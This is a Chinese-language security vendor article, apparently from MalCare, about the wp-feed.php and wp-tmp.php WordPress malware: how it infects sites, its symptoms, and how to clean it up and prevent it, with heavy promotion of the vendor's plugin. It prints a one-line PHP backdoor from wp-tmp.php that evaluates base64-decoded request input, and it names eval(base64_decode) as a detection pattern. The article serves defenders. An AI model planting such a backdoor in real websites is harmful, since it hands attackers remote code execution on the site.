• 主頁
  • 文章
  • 指導
  • 修復 WordPress 中的 Wp-Feed.php 和 Wp-Tmp.php 惡意軟件 - MalCare

修復 WordPress 中的 Wp-Feed.php 和 Wp-Tmp.php 惡意軟件 - MalCare

已發表: 2023-04-19

您的惡意軟件掃描程序是否警告您“您的網站被黑了”,但您認為它看起來還不錯?

訪問者是否抱怨您的 WordPress 網站上有垃圾郵件廣告,但您沒有看到任何廣告?

您的網站很可能被黑客入侵。

黑客找到了巧妙的方法來向網站所有者掩飾他們的黑客行為,這樣他們就不會被發現,並且他們可以在很長一段時間內繼續利用該網站。

wp-feed.php 是目前偽裝得最巧妙的 hack 之一。

它向網站所有者隱藏,向您的訪問者顯示非法產品、毒品和成人內容的廣告。

即使您能夠檢測到它,找到感染已經傳播到的所有地方不僅困難而且有時是不可能的。 去除感染既複雜又困難。 如果您設法將其移除,在 10 例中有 8 例會再次出現感染。

底線:很難從 WordPress 網站中刪除 wp-feed.php 感染。

幸運的是,我們之前已經無數次處理過這種惡意軟件。 在過去十年中,我們不僅成功地從成百上千個 WordPress 網站中刪除了 wp-feed,而且還防止了再次感染。

不用擔心。 你得到了很好的照顧。

在本文中,您將了解到:

  • wp-feed.php 惡意軟件如何運作以及它如何影響您的網站
  • 如何將其從您的網站中刪除
  • 以後如何預防再次感染

TL;DR要刪除 wp-feed.php 感染,您只需安裝我們的WordPress 惡意軟件刪除並運行自動清除功能即可。 該插件還通過刪除網站後門來幫助防止重新感染,這些後門可以重新感染並阻止惡意流量使用防火牆和登錄保護訪問您的網站。

什麼是 wp-feed.php 和 wp-tmp.php? (原因、症狀和再感染)

簡而言之: WP-Feed 是一種在網站上顯示惡意廣告的惡意軟件。 目標是讓您的訪問者點擊廣告並將他們重定向到惡意網站。

你一定想知道——

> 我的網站是如何被感染的?

感染通常是由於使用無效的插件或主題引起的。

無效軟件很有吸引力,因為它們免費為您提供高級功能。 許多人認為分發無效軟件是出於善意。

通常情況遠非如此。 分發無效軟件,以便黑客可以毫不費力地訪問您的站點。

無效的插件或主題充斥著惡意軟件。 當您在您的網站上安裝一個無效的主題或插件時,您基本上是在為黑客打開訪問您網站的大門。

除了無效的軟件,過時的插件和主題也容易受到攻擊。 黑客利用這些漏洞闖入您的網站。

他們還利用弱用戶名和密碼,如“admin”和“p@ssword”。 憑據薄弱很容易猜到。

黑客可以猜測您的用戶名和登錄名,並將 wp-feed.php 惡意軟件直接植入您的網站。

> 為什麼黑客會用 wp-feed.php 感染網站?

目的是竊取您的訪問者並欺騙他們購買虛假服務或產品,以便黑客可以創收。

真正令人驚奇的是,他們通常能夠在網站所有者沒有得到任何提示的情況下實現這一目標。

這讓我們想到了這個問題——

> 為什麼很難注意到這種感染的症狀?

一旦黑客獲得了對您網站的訪問權限,他們就會將兩個文件(wp-feed.php 和 wp-tmp.php)植入您的 wp-includes 文件夾中。

wp-includes 文件夾是 WordPress 核心的一部分。 這是您網站主題所在的位置。

WP 提要文件開始感染其他 WordPress 文件,尤其是 function.php,它是您活動主題的一部分。

function.php文件zilla

從 function.php 中,黑客能夠在您的 WordPress 網站上顯示惡意彈出廣告。

真正邪惡的部分是廣告只顯示給新訪客,而不是回頭客。 該惡意軟件會記錄您網站的訪問者,以確保只有新訪問者才能看到廣告。 這是一種防止被發現的巧妙方法。

wp-feed 惡意軟件

因此,作為您自己網站的常客,您永遠不會注意到任何黑客入侵的跡象。

如何清除 wp-feed.php 惡意軟件?

有兩種方法可以消除感染。 那些是 -

1.使用插件(簡單)

2. 手動完成(困難)

讓我們深入了解每種方法。

1. 使用插件刪除 WP-Feed.php 惡意軟件(簡單方法)

你們中的一些人可能已經在您的網站上安裝了安全插件。 可能是這個插件提醒您有關惡意文件的信息——wp-includes/wp-feed.php 和 wp-includes/wp-tmp.php

大多數安全插件都提供惡意軟件清除服務,但很少有插件能像 MalCare Security 那樣快速有效地完成這項工作。

  • MalCare 將在60 秒內清理您的網站。 你不必舉票。 您不必排隊等候。 您不必將您網站的憑據交給第三方插件。
  • 不僅如此,該插件還超越了每個角落,尋找隱藏的惡意軟件。 它會發現您網站上存在的每一個惡意腳本
  • 它使用非傳統方法檢測新的和隱藏良好的惡意軟件。 它徹底分析代碼的行為以識別惡意意圖。 這也有助於確保它不會將好代碼標記為壞代碼
  • 它會在幾分鐘內完成所有這些工作。

讓我們用 MalCare 清除 wp-feed.php 感染。

第 1 步:在您的 WordPress 網站上安裝並激活 MalCare Security。

第 2 步:從儀表板菜單中選擇 MalCare。 輸入您的電子郵件地址,然後單擊Secure Site Now

現在是 malcare 安全站點

第 3 步:在下一頁上,系統會要求您輸入密碼,然後輸入您的 URL

MalCare 將立即開始掃描您的網站。 目的是找到您網站上存在的每一個惡意代碼實例。

這意味著,它不僅會檢測 wp-feed.php 和 wp-tmp.php 文件,還會檢測所有感染 WordPress 文件的惡意代碼,包括隱藏在 function.php 文件中的實例。

您可以放心,該插件還會找到您網站上存在的每個後門,以防止再次感染。

添加網站

發現惡意腳本後,插件會提醒您。

接下來,您需要清理您的網站。

醫療保健安全

請注意,MalCare 的惡意軟件清除是一項高級功能。 它是目前唯一的即時惡意軟件刪除插件。 只需每年 99 美元,您就可以根據需要多次清理單個站點,並確保獲得可能擁有的最佳保護。 詳細了解MalCare 定價

第 4 步:要從您的網站中刪除 wp-feed.php 的所有痕跡,您需要做的就是單擊“自動清除”按鈕。

MalCare 將立即開始清理您的網站。

malcare 自動清潔

就是這樣,伙計們。 這就是您使用插件清理網站的方式。

2. 手動刪除 WP-Feed.php 惡意軟件(困難的方法)

手動清除感染是相當具有挑戰性的,因為在這種類型的感染中,有很多移動的部分。

  • 黑客上傳了兩個惡意文件——wp-feed.php 和 wp-tmp.php。 您需要刪除它們才能開始。 這可能是唯一容易的一點。
  • 感染傳播到其他 WordPress 文件,包括 function.php 文件。 這很難,因為誰能說清楚感染在哪里傳播。
    • 找到所有惡意代碼需要幾個小時。
    • 識別惡意代碼很困難,因為它們偽裝得很好並且看起來像正常的代碼片段。
    • 一些已知的惡意代碼,如“eval(base64_decode)”,可能是合法插件的一部分。 它們不會以惡意方式使用。 因此,刪除代碼會影響您的插件,甚至可能破壞您的網站。
    • 您很有可能會錯過可能導致再次感染的代碼片段。

因此,手動刪除根本無效。

但是,如果您仍想這樣做,請對您的網站進行完整備份。 如果您最終不小心刪除了某些內容並破壞了您的網站,您可以快速將其恢復正常。

這是您可以選擇的最佳備份服務列表。

這裡有一篇文章可以幫助您手動刪除惡意軟件 – WordPress hacked。 只需跳轉到“如何手動清理被黑的 WordPress 網站”部分。

您的網站現在沒有感染,但還遠談不上安全。 黑客仍然可以瞄準您的網站並嘗試感染它。 您需要確保您的網站免受未來感染。 但在開始之前,讓我們先看看 wp-feed.php 和 wp-tmp.php 感染的影響。

wp-temp.php 惡意軟件感染的影響

不用說,wp-feed.php 和 wp-tmp.php 惡意軟件的存在會對您的網站造成毀滅性的影響。

感染wp-temp.php的網站往往會出現以下後果:

  • 您會注意到跳出率的跳躍訪問者在您網站上花費的時間的減少
  • 彈出式廣告會使您的網站變得沉重而且非常緩慢
  • 沒有人喜歡速度慢的網站,因此訪問者很可能會在您的頁面加載到瀏覽器之前點擊後退按鈕。 這將產生多米諾骨牌效應。
  • 搜索引擎會注意到人們離開您網站的速度有多快。 他們會得出結論,您沒有提供用戶正在搜索的內容。 你的搜索引擎排名會下降
  • 這意味著您可能花費在 SERP 中排名更高的所有努力、時間和金錢都浪費了

谷歌黑名單

  • 被黑網站被谷歌列入黑名單並被託管服務提供商暫停。 此外,如果被黑網站正在運行谷歌廣告,則 Adwords 帳戶將被暫停。 所有這些都將導致流量進一步下降。
  • 此外,如果您沒有使用正確的工具,則必須清理被黑網站,這可能是一件代價高昂的事情

好消息是您知道您的網站被黑了。 因此,您可以清潔它並停止影響。

將來如何保護您的站點免受 wp-feed.php 惡意軟件的侵害?

我們的許多讀者可能已經嘗試從他們的站點中刪除 wp-feed.php 惡意軟件,卻發現該惡意軟件不斷返回。

發生這種情況是因為您的站點上安裝了後門。 大多數後門程序偽裝得非常好,以至於業餘開發人員可以將它們作為合法代碼傳遞。

在上一節中,我們解釋說黑客會在您的網站代碼中插入兩個文件 wp-feed.php 和 wp-tmp.php。 wp-tmp.php 文件充當後門。 如果你打開文件,你會發現一個看起來像這樣的腳本 -

 $p = $REQUEST$#91;"m"]; eval(base64_decode ($p));

好消息是,您可以通過採取以下措施來保護您的網站免受未來的黑客攻擊 –

1.刪除無效軟件並停止使用它們

如果您在網站上使用無效的插件或主題,請立即將其刪除

黑客首先使用無效軟件訪問您的站點。 無論您如何清理網站,如果您不刪除無效軟件,黑客就會找到進入您網站並植入惡意軟件的途徑。

如果您已授予用戶安裝插件和主題的權限,請確保他們從不使用無效軟件。

事實上,最好練習在 MalCare 的幫助下完全阻止插件和主題的安裝

您需要做的就是登錄 MalCare 的儀表板,選擇您的網站,單擊Apply Hardening ,然後啟用Block Plugin/Theme Installation。

阻止插件或主題安裝

2.加強您的網站安全

您可以通過更改文件權限來防止黑客將 wp-feed.php 等惡意文件植入您的 WordPress 文件夾中。

文件權限是一組規則,用於確定誰可以訪問哪些文件。 您可以阻止用戶修改 wp-includes 文件夾。 要更深入地了解文件權限,請查看本指南:WordPress 文件權限。

更改權限文件管理器

您還可以通過禁用文件編輯器來阻止黑客修改您的主題。 這將防止他們在您的網站上插入彈出式廣告。 您可以手動執行此操作,但有風險且不推薦。

如果您的網站上已經安裝了 MalCare,您需要做的就是單擊一個按鈕來禁用文件編輯器。

禁用文件編輯器

了解有關 WordPress 強化的更多信息。

3. 保持網站更新

就像任何其他軟件一樣,WordPress 插件和主題也會產生漏洞。 當開發人員得知此漏洞時,他們會迅速創建補丁並以更新的形式發布。

如果實施更新有任何延遲,就會使您的網站面臨風險。

黑客善於利用漏洞。 事實上,他們一直在尋找有漏洞的網站,以便他們可以利用它來訪問該網站並用惡意軟件感染該網站。

因此,永遠不要延遲更新。

您可以從此處了解有關安全更新的更多信息 – WordPress 安全更新。

這裡有一份指南可以幫助您保持網站更新 – 如何更新 WordPress。

4.強制使用強憑證

訪問您網站的最簡單方法是通過您的登錄頁面。

黑客只需要成功猜出您的用戶憑據即可。 事實上,他們設計的機器人可以在幾分鐘內嘗試數百種用戶名和密碼組合。 如果您或您的任何隊友使用的是易於猜測的憑據,例如“admin”和“password123”,機器人將在 2 秒內攻破您的站點。 這稱為蠻力攻擊。

確保您網站的每個用戶都使用唯一的用戶名和強密碼非常重要。

您甚至可以超越此範圍並實施多種措施來保護您的登錄頁面。 我們編制了一份您可以採取的 WordPress 登錄安全措施列表。

5.使用防火牆

如果您能夠從一開始就阻止黑客登陸您的網站,那不是很好嗎?

防火牆正是您需要的工具。

會調查想要訪問您網站的流量。 如果檢測到流量來自惡意 IP 地址,防火牆會立即阻止流量。

通過這種方式,它可以過濾掉黑客和機器人。

這是您可以在您的站點上激活的最佳 WordPress 防火牆列表。

但是,如果您使用的是 MalCare,那麼您的站點上已經激活了防火牆。

惡意防火牆

接下來是什麼?

我們已經向您展示瞭如何清理您的網站以及如何確保您再也不會被黑客入侵。

我們認為可以使您的網站免於許多災難的一條建議是 – 定期備份您的網站。

無論您的網站是突然出現錯誤還是損壞,備份都可以幫助您快速臨時修復您的網站。

如果您訂閱了 MalCare Security,您還可以額外付費使用備份插件。 與我們聯繫以了解更多信息。

試一試MalCare 安全插件